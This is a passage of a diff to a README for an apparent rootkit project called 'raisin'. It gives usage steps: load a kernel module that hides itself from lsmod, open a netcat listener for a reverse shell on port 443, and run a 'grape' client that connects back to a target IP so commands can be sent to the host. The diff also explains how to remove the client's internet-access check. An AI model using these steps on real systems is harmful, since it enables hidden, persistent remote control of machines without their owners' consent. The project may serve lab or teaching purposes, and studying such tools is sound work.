asuar078/raisin/README.md

 2. Load the rootkit using `sudo insmod rootkit.ko`, the rootkit will hide itself so it can't be seen with `lsmod` till the `unhide` command is given.
 3. Open a listener for the reverse shell using `sudo nc -lvp 443`.
 On the default build target IP is set for default VM IP of `10.0.2.15`.
-4. Start the grape client `./grape`
+4. Start the grape client `./grape`, if no internet access is available grape will shutdown.
+If you wish to remove this simple delete line `74-75` in grape.c and recompile.
 5. The reverse shell is now active and can be used to send commands to the host machine.
 6. In the `/tmp` directory a pipe is created named `grape_fifo`.
 Sending `echo -n`